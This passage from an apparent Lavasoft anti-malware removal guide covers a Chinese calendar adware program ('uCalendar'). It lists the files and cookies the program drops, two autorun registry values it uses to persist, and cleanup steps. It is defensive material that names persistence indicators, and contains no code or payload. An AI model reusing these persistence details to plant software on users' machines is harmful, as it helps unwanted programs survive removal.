    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xxurl[1].htm (361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tmp[1].exe (48329 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[3].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[4].php (749 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\weather.dat (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\md5[1].txt (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uiconfig.txt (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qian[1].htm (102 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tmp.exe (48329 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@down.xiaoxinrili[1].txt (224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[2].htm (488 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[3].php (751 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@count.xiaoxinrili[1].txt (206 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\uCalhtml[1].txt (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[2].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[2].php (751 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (393 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[2].php (1097 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tclock.ini (184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\FMTFilterinset[1].txt (108 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[1].txt (412 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].txt (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Version[1].txt (1 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@7day.xiaoxinrili[2].txt (206 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Install.ini (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Install[1].txt (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[1].htm (552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\PopBoxBig[1].txt (11 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "riliquicken" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe apprun"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2024 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now